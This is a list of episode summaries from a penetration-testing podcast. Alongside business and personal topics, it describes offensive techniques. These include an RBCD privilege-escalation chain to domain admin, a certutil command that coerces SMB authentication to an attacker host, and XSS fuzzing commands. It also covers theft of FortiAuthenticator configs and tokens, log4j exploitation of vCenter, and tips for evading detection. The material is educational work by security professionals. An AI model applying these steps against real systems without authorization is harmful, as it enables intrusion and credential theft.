Below is a blurb on each podcast episode, as well as a link to the corresponding show notes (if available). I apologize but this gist is often a little outdated, so to view the show notes for the latest episodes be sure to also check out 7MinSec.com/blog.

Published: Friday, January 24, 2025

Today I'm excited about some tools/automation I've been working on to help shore up the 7MinSec security program, including:.

• Using Retype as a document repository
• Leveraging the Nessus API to automate the downloading/correlating of scan data
• Monitoring markdown files for "last update" changes using a basic Python script

View this episode's show notes for more information

Published: Friday, January 17, 2025

Hey friends, today we cover:.

• The shiny new 7MinSec Club
• BPATTY updates
• A talk-through of the WPA3 downgrade attack, complemented by the YouTube livestream

View this episode's show notes for more information

Published: Friday, January 10, 2025

Hello friends! Today we're talking about a neat and quick-to-setup documentation service called Retype . In a nutshell, you can get Retype installed on GitHub pages in about 5 minutes and be writing beautiful markdown pages (with built-in search) immediately. I still...

View this episode's show notes for more information

Published: Friday, January 03, 2025

Happy new year friends! Today we talk about business/personal resolutions, including:.

• New year's resolution on the 7MinSec biz side to have a better work/life balance
• New training offering in the works
• Considering Substack as a communications platform
• A mental health booster that I came across mostly by accident

View this episode's show notes for more information

Published: Monday, December 30, 2024

Today we're doing a milkshake of several topics: wireless pentest pwnage, automating the boring pentest stuff with cursor.ai , and some closing business thoughts at 7MinSec celebrates its 7th year as a security consultancy. Links discussed today:.

• AWUS036ACH wifi card (not my favorite anymore)
• Panda PAU09 N600 (love this one!)
• The very important Github issue that helped me better understand BPFs and WPA3 attacks
• TrustedSec article on WPA3 downgrade attacks

View this episode's show notes for more information

Published: Friday, December 13, 2024

Today we've got some super cool stuff to cover today! First up, BPATTY v1.4 is out and has a slug of cool things: The cocoa-flavored cherry on top is a tale of pentest pwnage that includes:.

• A whole new section on old-school wifi tools like airmon-ng, aireplay-ng and airodump-ng
• Syntax on using two different tools to parse creds from Dehashed
• An updated tutorial on using Gophish for phishing campaigns
• Abusing SCCM
• Finding gold in SQL configuration/security audits

View this episode's show notes for more information

Published: Friday, December 06, 2024

Hey friends, today we're talking about tips to effectively present your technical assessment to a variety of audiences - from lovely IT and security nerds to C-levels, the board and beyond!

View this episode's show notes for more information

Published: Monday, December 02, 2024

Today's episode talks about some things that helped me get through a stressful and hospital-visit-filled Thanksgiving week, including:.

• Journaling
• Meditation
• (An activity I'm ashamed of but has actually done wonders for my mental health)

View this episode's show notes for more information

Published: Friday, November 22, 2024

Hey friends, we've got a short but sweet tale of pentest pwnage for you today. Key lessons learned:.

• Definitely consider BallisKit for your EDR-evasion needs
• If you get local admin to a box, enumerate, enumerate, enumerate! There might be a delicious task or service set to run as a domain admin that can quickly escalate your privileges!

View this episode's show notes for more information

Published: Friday, November 15, 2024

Oooooo, giggidy! Today is (once again) my favorite tale of pentest pwnage. I learned about a feature of PowerUpSQL that helped me find a "hidden" SQL account, and that account ended up being the key to the entire pentest! I wonder how many hidden SQL...

View this episode's show notes for more information

Published: Friday, November 08, 2024

Today we take a look at a zero-trust / ditch-your-VPN solution called Twingate (not a sponsor but we'd like them to be)! It also doubles nicely as a primary or backup connection for your DIY pentest dropboxes which we've talked about quite a bit...

View this episode's show notes for more information

Published: Friday, November 01, 2024

Hey friends, today I'm sharing my first (and non-sponsored) impressions of Level.io, a cool tool for managing Windows, Mac and Linux endpoints. It fits a nice little niche in our pentest dropbox deployments, it has an attractive price point and their support is fantastic.

View this episode's show notes for more information

Published: Friday, October 25, 2024

Today we're talkin' business - specifically how to make your report delivery meetings calm, cool and collect (both for you and the client!).

View this episode's show notes for more information

Published: Friday, October 18, 2024

Hey friends, today I'm putting my blue hat on and dipping my toes in incident response by way of playing with Velociraptor , a very cool (and free!) tool to find evil in your environment. Perhaps even better than the price tag, Velociraptor runs as a...

View this episode's show notes for more information

Published: Monday, October 14, 2024

Today I do a short travelogue about my trip to Washington, geek out about some cool training I did with Velociraptor , ponder drowning myself in blue team knowledge with XINTRA LABS , and share some thoughts about the conference...

View this episode's show notes for more information

Published: Friday, October 04, 2024

Hey! I'm speaking in Wanatchee, Washington next week at the NCESD conference about 7 ways to panic a pentester! Today's tale of pentest pwnage is a great reminder to enumerate, enumerate, enumerate! It also emphases that cracking...

View this episode's show notes for more information

Published: Saturday, September 28, 2024

Today we continue where we left off in episode 641 , but this time talking about how to automatically deploy and install a Ubuntu-based dropbox! I also share some love for...

View this episode's show notes for more information

Published: Monday, September 23, 2024

Ron Cole of Immersive Labs joins us to talk pentest war stories, essential skills he learned while serving on a SOC, and the various pentest training and range platforms you can use to sharpen your security skills! Here are the links Ron shared during our discussion:.

• VetSec
• Fortinet Veterans Program
• Immersive Labs Cyber Million
• FedVTE

View this episode's show notes for more information

Published: Friday, September 13, 2024

Today we're revisiting the fun world of automating pentest dropboxes using Proxmox, Ansible, Cursor and Level . Plus, a tease about how all this talk about automation is getting us excited for a long-term project: creating a free/community edition...

View this episode's show notes for more information

Published: Saturday, September 07, 2024

This was my favorite pentest tale of pwnage to date! There's a lot to cover in this episode so I'm going to try and bullet out the TLDR version here:.

• Sprinkled farmer files around the environment
• Found high-priv boxes with WebClient enabled
• Added "ghost" machine to the Active Directory (we'll call it GHOSTY)
• RBCD attack to be able to impersonate a domain admin using the CIFS/SMB service against the victim system where some higher-priv users were sitting
• Use net.py to add myself to local admin on the victim host
• Find a vulnerable service to hijack and have run an evil, TGT-gathering Rubeus.exe - found that Credential Guard was cramping my style!
• Pulled the TGT from a host not protected with Credential Guard
• Figured out the stolen user's account has some "write" privileges to a domain controller
• Use rbcd.py to delegate from GHOSTY and to the domain controller
• Request a TGT for GHOSTY
• Use getST.py to impersonate CIFS using a domain admin account on the domain controller (important thing here was to specify the DC by its FQDN, not just hostname)
• Final move: use the domain admin ccache file to leverage net.py and add myself to the Active Directory Administrators group

View this episode's show notes for more information

Published: Tuesday, September 03, 2024

Today's tale of pentest pwnage talks about the dark powers of the net.py script from impacket .

View this episode's show notes for more information

Published: Friday, August 23, 2024

Today we're talking pentesting - specifically some mini gems that can help you escalate local/domain/SQL privileges:.

• Check the C: drive! If you get local admin and the system itself looks boring, check root of C - might have some interesting scripts or folders with tools that have creds in them.
• Also look at Look at Get-ScheduledTasks
• Find ids and passwords easily in Snaffler output with this Snaffler cleaner script
• There's a ton of gold to (potentially) be found in SQL servers - check out my notes on using PowerUpSQL to find misconfigs and agent jobs you might able to abuse!

View this episode's show notes for more information

Published: Saturday, August 17, 2024

Hello friends, I'm excited to release BPATTY[RELOADED] into the world at https://bpatty.rocks ! - which stands for Brian's Pentesting and Technical Tips for You! It's a knowledge base of IT and security bits that help me do a better job doing security stuff! Today I do an...

View this episode's show notes for more information

Published: Monday, August 12, 2024

Artificial hype alert! I'm working on a NEW version of BPATTY (Brian's Pentesting and Technical Tips for You), but it is delayed because of a weird domain name hostage negotiation situation. It's weird. But in the meantime I want to talk about the project (which is a pentest documentation library...

View this episode's show notes for more information

Published: Saturday, August 03, 2024

Today we're talking about eating the security dog food - specifically:.

• Satisfying critical security control #1
• Using the Atlassian family of tools to create a ticketing/change control system and wrap it into an asset inventory
• Leveraging Wazuh as a security monitoring system (with eventual plans to leverage its API to feed Atlassian inventory data)

View this episode's show notes for more information

Published: Friday, July 26, 2024

Hi, today's tale of pentest pwnage covers a few wins and one loss: A cool opportunity to drop Farmer "crops" to a domain admin's desktop folder via PowerShell remote session Finding super sensitive data by dumpster-...

View this episode's show notes for more information

Published: Friday, July 19, 2024

Hey friends, we're doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus ! It's cool, it's free, it's from Meta and you can get up and going in just a few commands - check out...

• docusaurus.config.js - for setting the site title and key config settings
• sidebars.js - used to create/edit navigation bar menus
• /src/css/custom.css - to style the site

View this episode's show notes for more information

Published: Friday, July 12, 2024

Today's tale of pentest pwnage includes some fun stuff, including: And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!.

• SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task - like ping -n 1 your.kali.ip.address. When you're ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \your.kali.ip.address\arbitrary-folder. I'm not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you're on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under. DonPAPI got an upgrade recently with a focus on evasion! When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you've got the vmss2core utility, which I couldn't find anywhere except the Internet Archive . Then I really like to follow this article to pull passwords from VM memory dumps. Can't RDP into a victim system that you're PSRemote'd into? Maybe RDP is listening on an alternate port! Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp | select-object portnumber`
• SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task - like ping -n 1 your.kali.ip.address. When you're ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \your.kali.ip.address\arbitrary-folder.
• I'm not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you're on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under.
• DonPAPI got an upgrade recently with a focus on evasion!
• When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you've got the vmss2core utility, which I couldn't find anywhere except the Internet Archive . Then I really like to follow this article to pull passwords from VM memory dumps.
• Can't RDP into a victim system that you're PSRemote'd into? Maybe RDP is listening on an alternate port! Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp | select-object portnumber`

View this episode's show notes for more information

Published: Sunday, July 07, 2024

Hi friends, today's a tale full of test tips and tools to help you in your adventures in pentesting!.

• SCCM Exploitation SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud'homme - fantastic resource for learning all about attacking SCCM - starting from a perspective of zero creds
• CMLoot - find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares
• Snaffler - finds all the interesting SMB shares and juicy file contents
• Efflanrs - takes the raw Snaffler log and turns it into an interactive Web app!
• RubeusToCcache - a small tool to convert Base64-encoded .kirbi tickets from Rubeus into .ccache files for Impacket

View this episode's show notes for more information

Published: Monday, July 01, 2024

Today I recap a two week personal/biz road trip and talk about the security stuff that got sprinkled into it, including:.

• Family members who don't care about their personal security
• Weakpass - a cool collection of word lists for brute-forcing and spraying that I'd never heard of
• Working on two security Webinars for Netwrix (here's part 1: Mastering Password Security & Active Directory Monitoring , and and part 2: Advanced Strategies for SQL Server Protection & Sensitive Information Security )
• The moment we though our credit card was stolen at a waterpark
• A shameless plug for our fun interview with Stu the recruiter
• Some internal pentest tips that have given us some gold in recent assessments
• Super fast, spoiler-free movie reviews of Roadhouse , Arcadian , Late Night with the Devil and The Coffee Table

View this episode's show notes for more information

Published: Monday, June 24, 2024

Today we have a fun featured interview with my new friend Stu Musil of Ambient Consulting I had a great time talking with Stu about bashing come common misconceptions people have about working with recruiters, plus tackling some frequently asked questions:.

• How do you properly vet a recruiter you don't know, but who offers a job opportunity you're interested in?
• What questions should you ask a potential recruiter to get a feel for their level of experience in the industry (hint, if a recruiter doesn't even have a LinkedIn page, that's probably a red flag)
• Resume tips: Finding the right length and tone Tailoring your resume for each individual job Highlighting your strengths Do people still use cover letters when applying to a gig? Is a "hobbies and interests" section still a good idea on a resume (to show them you're not a robot who works 24/7)?
• Finding the right length and tone Tailoring your resume for each individual job Highlighting your strengths Do people still use cover letters when applying to a gig? Is a "hobbies and interests" section still a good idea on a resume (to show them you're not a robot who works 24/7)?
• Finding the right length and tone
• Tailoring your resume for each individual job
• Highlighting your strengths
• Do people still use cover letters when applying to a gig?
• Is a "hobbies and interests" section still a good idea on a resume (to show them you're not a robot who works 24/7)?
• Lets talk about some horror and/or success stories from the world of recruiting!

View this episode's show notes for more information

Published: Friday, June 14, 2024

Hey friends, today we talk about some not-so-glamorous but ever-so-important stuff related to running a cybersecurity consultancy, including:.

• Taking an inventory of all the SaaS stuff your business uses - to keep an eye on spending, know when services are expiring, and track which credit card the services are tied to (so the services don't almost get cancelled like some did with me!)
• Tracking domain names, and setting up your own automated rules to notify you well ahead of time when a domain is expiring (maybe that passion project is never gonna happen...time to let those old domains go :-)
• Making a spreadsheet of all important accounts and checking all the auth methods allowed for each account - to prevent attacks such as SIM-swapping

View this episode's show notes for more information

Published: Monday, June 10, 2024

Hey friends, today we continue our series all about migrating from VMWare to the world Proxmox! Specifically:.

• Getting my first Proxmox-based NUCs out in the field for live engagements!
• Pulling the trigger on two bare-metal Proxmox servers to eventually replace my vCenter environment. OVHCloud made it super easy to to add Proxmox to those bare-metals with a simple wizard. I couldn't figure out how to get a Proxmox VM as the main firewall for the whole Proxmox node, but it turns out it helps to RTFM. When getting a bare-metal OS/hypervisor installed, be careful in that the provider may leave the management ports of that host open to the whole world. In OVH's case, they have a software firewall that can be tuned so that, for example, only you can hit the management ports for the box. Getting VLANs setup is a snap once the virtual hardware stuff is in place.
• OVHCloud made it super easy to to add Proxmox to those bare-metals with a simple wizard.
• I couldn't figure out how to get a Proxmox VM as the main firewall for the whole Proxmox node, but it turns out it helps to RTFM.
• When getting a bare-metal OS/hypervisor installed, be careful in that the provider may leave the management ports of that host open to the whole world. In OVH's case, they have a software firewall that can be tuned so that, for example, only you can hit the management ports for the box.
• Getting VLANs setup is a snap once the virtual hardware stuff is in place.

View this episode's show notes for more information

Published: Friday, May 31, 2024

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 20% discount! Hey friends, today we've got a...

• Burp Suite Enterprise
• Caido - a lightweight alternative to Burp
• wfuzz - Web fuzzer. Using a proxy:wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt --sc 200 "https://somedomain.com/shopping?&qty=%2FUZZ" -p 10.0.7.11:8080
• KNOXSS - for XSS testing - pairs nicely with this wrapper: https://github.com/xnl-h4ck3r/knoxnl

View this episode's show notes for more information

Published: Friday, May 24, 2024

Road trip time! I've been traveling this week doing some fun security projects, and thought all this highway time would be a perfect opportunity to take a dip into the 7MS mail bag! Today's questions include:.

• How do you price internal network penetration tests?
• Have you ever had to deal with a difficult client situation, and how did you resolve it?
• Are you done going after certs? Spoiler: no - I'm interested in doing the XINTRA labs (not sure if it includes a cert)
• Do you provide managed services or just stick with more "one and done" assessment work?
• You said the "smart business people" tell you to form reseller partnerships, otherwise you're leaving money on the table - so why don't you?
• I'm thinking of starting my own cybersecurity consultancy - what type of insurance do I need to protect me in case of a digital "oops?"

View this episode's show notes for more information

Published: Friday, May 17, 2024

Today's tale of pentest pwnage is all about my new favorite attack called SPN-less RBCD. We did a teaser episode last week that actually ended up being a full episode all about the attack, and even step by step...

• Our first first impressions of Burp Enterprise
• Why I have a real hard time believing you have to follow all these steps to install Kali on Proxmox

View this episode's show notes for more information

Published: Friday, May 10, 2024

Today's prelude to a tale of pentest pwnage talks about something called "spnless RBCD" (resource-based constrained delegation). Here are the key steps: Lets use my lab of tangent.town as an example and say that TT-DC02 is where Webdav is enabled. Add a DNS record that points to your testing box...

View this episode's show notes for more information

Published: Sunday, May 05, 2024

Sadly, the Broadcom acquisition of VMWare has hit 7MinSec hard - we love running ESXi on our NUCs, but ESXi free is no longer available. To add insult to injury, our [vCenter lab at...

View this episode's show notes for more information

Published: Friday, April 26, 2024

Today we revisit a series about eating the security dog food - in other words, practicing what we preach as security gurus! Specifically we talk about:.

• We're going to get a third-party assessment on 7MinSec (the business)
• Tips for secure email backup/storage
• Limiting the retention of sensitive data you store in cloud places

View this episode's show notes for more information

Published: Sunday, April 21, 2024

Today we're talking about tips to deal with stress and anxiety:.

• It sounds basic, but take breaks - and take them in a different place (don't just stay in the office and do more screen/doom-scrolling)
• I've never gotten to a place in my workload where I go "Ahhh, all caught up!" so I should stop striving to hit that invisible goal.
• Chiropractic and back massages have done wonders for the tightness in my neck and shoulders
• For me, video games where you punch and kick things relieves stress as well (including a specific game that's definitely not for kids !)

View this episode's show notes for more information

Published: Sunday, April 14, 2024

We did something crazy today and recorded an episode that was 7 minutes long! Today we talk about some things that have helped us out in recent pentests:.

• When using Farmer to create "trap" files that coerce authentication, I've found way better results using Windows Search Connectors (.searchConnector-ms) files
• This matrix of "can I relay this to that" has been super helpful, especially early in engagements

View this episode's show notes for more information

Published: Friday, April 05, 2024

Today's episode is all about writing reports in Sysreptor . It's awesome! Main takeaways:.

• The price is free (they have a paid version as well)!
• You can send findings and artifacts directly to the report server using the reptor Python module
• Warning: Sysreptor only exports to PDF (no Word version option!)
• Sysreptor has helped us write reports faster without sacrificing quality

View this episode's show notes for more information

Published: Friday, March 29, 2024

Hey friends, today we've got a tale of pentest pwnage that covers:.

• Passwords - make sure to look for patterns such as keyboard walks, as well as people who are picking passwords where the month the password changed is part of the password (say that five times fast)!
• Making sure you go after cached credentials
• Attacking SCCM - Misconfiguration Manager is an absolute gem to read, and The First Cred is the Deepest - Part 2 with Gabriel Prud'homme is an absolute gem to see. Also, check out sccmhunter for all your SCCM pwnage needs.

View this episode's show notes for more information

Published: Friday, March 22, 2024

Hey friends, today we have a super fun interview with Andrew Morris of GreyNoise to share. Andrew chatted with us about:.

• Young Andrew's early adventures in hacking his school's infrastructure (note: don't try this at home, kids!)
• Meeting a pentester for the first time, and getting his first pentesting job
• Spinning up a box on the internet, having it get popped instantly, and wondering..."Are all these people trying to hack me?"
• Battling through a pentester's least favorite part of the job: THE REPORT!
• GreyNoise's origin story
• How to build a better honeypot/honeynet

View this episode's show notes for more information

Published: Tuesday, March 19, 2024

Hey friends, sorry I'm so late with this (er, last) week's episode but I'm back! Today is more of a prep for tales of pentest pwnage, but topics covered include:.

• Make sure when you're snafflin ' that you check for encrypted/obfuscated logins and login strings - it might not be too tough to decrypt them!
• On the defensive side, I've found myself getting blocked doing things like SharpHound runs, Snaffler, PowerHuntShares, etc. Look through the readme files for these tools and try cranking down the intensity/threads of these tools and you might fly under the radar.

View this episode's show notes for more information

Published: Friday, March 08, 2024

Today we're talkin' business again - specifically as it relates to:.

• How much fun I had attending and speaking at Netwrix Connect
• Being a sales guy in conference situations without being an annoying sales guy in conference situations
• A recap of the talk I co-presented about high profile breaches and lessons we can learn from them

View this episode's show notes for more information

Published: Friday, March 01, 2024

Today's tale of pentest covers:.

• Farming for credentials (don't forget to understand trusted zones to make this happen properly!)
• Snaffling for juice file shares
• Stealing Kerberos tickets with Rubeus

View this episode's show notes for more information

Published: Sunday, February 25, 2024

Hello friends, we're still deep in the podcast trenches this quarter and wanted to share some nuggets of cool stuff we've been learning along the way:.

• Snaffler - pairs nicely with PowerHuntShares to find juicy tidbits within file/folder shares
• Group3r - helps you find interesting and potentially abusable Group Policy Object configurations
• Farmer - totally awesome toolkit for dropping tricky files on shares that will do things like fire up the Webclient service for any system browsing the share (doesn't require admin rights!) or coaxing a system into authenticating with you via HTTP or SMB

View this episode's show notes for more information

Published: Monday, February 19, 2024

Hey friends, sorry for the late episode but I've been deep in the trenches of pentest adventures. I'll do a more formal tale of pentest pwnage when I come up for air, but for now I wanted to share some tips I've picked up from recent engagements:.

• GraphRunner - awesome PowerShell toolkit for interacting with Microsoft Graph API. From a pentesting perspective, it may help you bridge the "gap" between LAN-side AD and Azure and find some goodies - like files with and XSLX extension containing the word password.
• PowerUpSQL -I typically use this to make SQL servers cough me up a hash via SMB using stored procedures, but I learned this week that I'll deeeefffffinitely use the Invoke-SQLAudit -Verbose functionality going forward.

View this episode's show notes for more information

Published: Friday, February 09, 2024

Hey friends, today we cover a funstrating (that's fun + frustrating) issue we had with our DIY pentest dropboxes. TLDL: label install menu label ^Install Yermaum kernel /install.amd/vmlinuz append net.ifnames=0 preseed/url=https://somewebsite/kali.preseed locale=en_US keymap=us hostname=kali777...

• The preseed file got jacked because I had a bad Kali metapackage in it.
• While I was tinkering around with preseed files, I decided it would be more efficient to have the Kali ISO call that preseed file directly over HTTP (rather than make a new ISO every time I made a preseed change). To accomplish that: Mount the Kali ISO Explore to isolinux > txt.cfg Modify the txt.cfg to include a custom boot option that calls your preseed over HTTP. For example:
• Mount the Kali ISO
• Explore to isolinux > txt.cfg
• Modify the txt.cfg to include a custom boot option that calls your preseed over HTTP. For example:

View this episode's show notes for more information

Published: Friday, February 02, 2024

Hey friends, today is a first impressions episode about Sysreptor , which according to their GitHub page, is a fully customisable, offensive security reporting solution designed for pentesters, red teamers and other security-related people alike. It is...

View this episode's show notes for more information

Published: Friday, January 26, 2024

Hey friends, today our pal Hackernovice joins us for a tool (actually two tools!) release party:.

• EvilFortiAuthenticator - it's like a regular FortiAuthenticator , but evil. This tool allows you to capture the FortiAuthenticator API and subsequently steal the entire device's config, subsequently allowing you to restore the config to a second server and potentially steal cleartext Active Directory creds and SMTP accounts! We talk about BulletsPassView - a tool that originially allowed us to simply unmask the "hidden" API key in the FortiAuthenticator client (this did NOT work in the latest version of FAC). Once you get the API key, check out Fortinet's documentation to do fun things like dump the whole config to a file on disk! After you steal the config and restore it to a fresh FortiAuthenticator, use maintenance mode to reset the admin password. Once you can adjust the restored config to your liking, try using MITMsmtp to capture email server creds in the clear! TCMLobbyBBQ - this tool has nothing to do with security, but helps PC players of the Texas Chain Saw Massacre get into lobbies more efficiently.
• EvilFortiAuthenticator - it's like a regular FortiAuthenticator , but evil. This tool allows you to capture the FortiAuthenticator API and subsequently steal the entire device's config, subsequently allowing you to restore the config to a second server and potentially steal cleartext Active Directory creds and SMTP accounts! We talk about BulletsPassView - a tool that originially allowed us to simply unmask the "hidden" API key in the FortiAuthenticator client (this did NOT work in the latest version of FAC). Once you get the API key, check out Fortinet's documentation to do fun things like dump the whole config to a file on disk! After you steal the config and restore it to a fresh FortiAuthenticator, use maintenance mode to reset the admin password. Once you can adjust the restored config to your liking, try using MITMsmtp to capture email server creds in the clear!
• BulletsPassView - a tool that originially allowed us to simply unmask the "hidden" API key in the FortiAuthenticator client (this did NOT work in the latest version of FAC).
• Once you get the API key, check out Fortinet's documentation to do fun things like dump the whole config to a file on disk!
• After you steal the config and restore it to a fresh FortiAuthenticator, use maintenance mode to reset the admin password.
• Once you can adjust the restored config to your liking, try using MITMsmtp to capture email server creds in the clear!
• TCMLobbyBBQ - this tool has nothing to do with security, but helps PC players of the Texas Chain Saw Massacre get into lobbies more efficiently.

View this episode's show notes for more information

Published: Friday, January 19, 2024

Today we talk about some business-y things like:.

• A pre first impressions opinion on Sysreptor
• Why I'm not worried about AI replacing manual pentesting (yet)
• My struggle with going "full CEO" vs. staying in the weeds and working on hands-on security projects

View this episode's show notes for more information

Published: Friday, January 12, 2024

Today our pals Bjorn Kimminich from OWASP and Paul from Project7 and TheUnstoppables.ai join us as we kick off a series all about hacking the [OWASP Juice Shop](https://owasp.org/www-...

• Found the score board
• Bullied the chatbot
• Fired a DOM XSS
• Located a confidential document
• Gave the Juice Shop a devastating zero stars review
• Fired a DOM XSS which played the OWASP Juice Shop Jingle

View this episode's show notes for more information

Published: Friday, January 05, 2024

Today our friend Amanda Berlin , Lead Incident Detection Engineer at Blumira , joins us to talk about being more mentally healthy in 2024!P.S. - did you miss Amanda's past visits to the program? Then check out episode...

View this episode's show notes for more information

Published: Tuesday, January 02, 2024

Today we tease two upcoming tool releases (shooting for Q1, 2024):Happy new year!.

• TCMLobbyBBQ - a Python script for PC players of The Texas Chain Saw Massacre game to help players get out of lobbies and into live games ASAP! The script uses PyAutoGUI to take screenshots of what part of the game you're in, then make appropriate key presses and mouse clicks to get into lobby queues, then alert you when the game actually starts!
• EvilFortiAuthenticator - this tool will allow you to steal administrator API tokens from FortiAuthenticator which can lead to full compromise of the physical device.

View this episode's show notes for more information

Published: Sunday, December 24, 2023

Today I look at potentially replacing Splashtop and UptimeRobot (check out our episode about it here ) with Tailscale and [Uptime...

View this episode's show notes for more information

Published: Friday, December 15, 2023

Today we're talkin' business! Specifically:.

• How to (gently) say "no" to (some) client projects
• How to (politely) challenge end-of-year deadlines
• An idea I'm kicking around in the lab - where I might do away with UptimeRobot and Splashtop in favor of Tailscale and Uptime Kuma

View this episode's show notes for more information

Published: Monday, December 11, 2023

Today our pal Nate Schmitt (you may remember him from his excellent Dealing with Rejection: A DMARC Discussion Webinar) joins us to talk about breaking up with Active Directory. He covers:.

• Why would you want to consider removing AD from your environment?
• What are common items to plan for?
• What steps should you take to efficiently plan a migration?
• What common challenges or considerations will you face?

View this episode's show notes for more information

Published: Friday, December 01, 2023

Hey friends, today I share my experience working with ChatGPT, Ollama.ai , PentestGPT and privateGPT to help me pentest Active Directory, as well as a machine called [Pilgrimage from...

View this episode's show notes for more information

Published: Saturday, November 25, 2023

Today we talk about our first experience working through the responsible disclosure process after finding vulnerabilities in a security product. We cannot share a whole lot of details as of right now, but wanted to give you some insight into the testing/reporting process thus far, which includes...

• BulletsPassView
• MITMsmtp
• mitmproxy

View this episode's show notes for more information

Published: Friday, November 17, 2023

Today our good buddy Paul and I keep trying to hack the VulnHub machine based on the movie Billy Madison (see part 1...

• Find Eric's secret SSH back door
• Locate and decrypt a hidden file with Billy's homework
• Build wordlists with cewl
• Save Billy from the evil clutches of Eric Gordon!!!

View this episode's show notes for more information

Published: Saturday, November 11, 2023

Today we had a blast talking with Robert McCurdy about JAMBOREE (Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy) ! JAMBOREE allows you to quickly spin up a portable Git/Python/Java environment and much...

View this episode's show notes for more information

Published: Sunday, November 05, 2023

After about a year break ( last edition of this series was in October, 2022 , we're back with an updated episode of How to Succeed in Business Without Really Crying. We cover:.

• Why we're not planning on selling the business any time soon
• Fast Google Dorks Scan
• Using ProtonVPN via command line
• Our pre first impressions of a pentesting SaaS tool you've almost definitely heard of

View this episode's show notes for more information

Published: Tuesday, October 31, 2023

Today we're joined by Matt Warner of Blumira (remember him from episodes #551 and #529 and #507...

View this episode's show notes for more information

Published: Monday, October 23, 2023

Today we're talking about how you can use PatchMyPC to keep your home PC and/or pentest dropbox automatically updated with the latest/greatest patches!

View this episode's show notes for more information

Published: Sunday, October 15, 2023

Hey friends, today my Paul and I kept trying to hack the VulnHub machine based on the movie Billy Madison (see part 1...

• Port knocking is awesome using utilities like knock :
• Sending emails via command line is made (fairly) easy with swaks:
• Hyda works good for spraying FTP creds:
• Check out my quick cheat sheet about bettercap (see episode #522 ) for some syntax on extracting WPA handshake data from cap files:

View this episode's show notes for more information

Published: Friday, October 06, 2023

Today we're talking about 7 steps you can take to (hopefully) reclaim a hacked Facebook account. The key steps are:Ask Facebook for help (good luck with that)Put out an SOS on your socialsFlag down the FBICall the cops!Grumble to your attorney generalHave patienceLock it down (once you get the...

View this episode's show notes for more information

Published: Friday, September 29, 2023

Today we talk about an awesome path to internal network pentest pwnage using downgraded authentication from a domain controller, a tool called ntlmv1-multi , and a boatload of cloud-cracking power on the...

View this episode's show notes for more information

Published: Friday, September 22, 2023

Today my Paul and I continued hacking Billy Madison (see part one here ) and learned some interesting things:wfuzz -c -z file,/root/Desktop/wordlist.txt --hc 404...

• You can fuzz a URL with a specific file type using a format like this:
• To rip .cap files apart and make them "pretty" you can use tpick:
• To do port knocking, you can use the knock utility:

View this episode's show notes for more information

Published: Friday, September 15, 2023

In today's tale of pentest pwnage we talk about:$sess = New-PSSession -Computername SERVER-I-HAVE-LOCAL-ADMIN-ACCESS-ON -Credential *...then provide your creds...and then:copy-item c:\superimportantfile.doc -destination c:\my-local-hard-drive\superimportantfile.doc -fromsession...

• The importance of local admin and how access to even one server might mean instant, full control over their backup or virtualization infrastructure
• Copying files via WinRM when copying over SMB is blocked:
• If you come across PowerShell code that crafts a secure string credential, you may able to decrypt the password variable with:

View this episode's show notes for more information

Published: Friday, September 08, 2023

Today Amanda Berlin from Blumira teaches us how to unlock the power of Sysmon so we can gain insight into the good, bad and ugly things happening on our corporate endpoints! Key takeaways:.

• Sysmon turns your windows logging up to 11, and pairs well with a config file like this one or this one .
• Careful if you are are running sysmon on non-SSD drives - the intense number of writes might bring that disk to its knees.
• Just getting started logging all the things with sysmon? Why not pump those logs into a free logging/alerting system like Wazuh ?
• I think it was SolarWinds log collector I was trying to think of while recording the show, not CloudTrail.

View this episode's show notes for more information

Published: Friday, September 01, 2023

Today my pal Paul from Project7 and I hack the heck out of Billy Madison a vulnerable virtual machine that is celebrating its 7th anniversary this month!

View this episode's show notes for more information

Published: Friday, August 25, 2023

Today, sadly, might be the last episode of DIY pentest dropbox tips for a while because I found (well, ChatGPT did actually) the missing link to 100% automate a Kali Linux install! Check episode #449 for more info on...

View this episode's show notes for more information

Published: Friday, August 18, 2023

Hey friends, today I'm super excited to share I found the missing link! Specifically, the missing piece that now allows me to create fully automated Windows 10 installs that serve as virtual pentest jumpboxes. Here are the high points: * When your deployment script is finishing and you need the...

View this episode's show notes for more information

Published: Friday, August 11, 2023

In today's tale of pwnage, we'll talk about how domain trusts can be dangerous because they have...well...trust issues.

View this episode's show notes for more information

Published: Friday, August 04, 2023

Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server ! Here's a quick set of install commands for Ubuntu: sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl -1sLf...

View this episode's show notes for more information

Published: Monday, July 31, 2023

Today we had a blast playing with Wazuh as a SIEM you can use for work and/or home. Inspiration for this episode came from Network Chuck . This one-liner will literally get Wazuh installed in...

View this episode's show notes for more information

Published: Friday, July 21, 2023

(Sorry, I don't know how to count. The video says it's pwnage part 48, but it's actually part 49)Oooo, giggidy! Today's tale of pentest pwnage is about pwning vCenter with CVE-2021-44228 - a vulnerability that lets us bypass authentication entirely and do/take what we want from vCenter! Key links...

• How to exploit log4j manually in vCenter
• How to automate the attack!
• Tool to steal the SAML database you extract from vCenter

View this episode's show notes for more information

Published: Monday, July 17, 2023

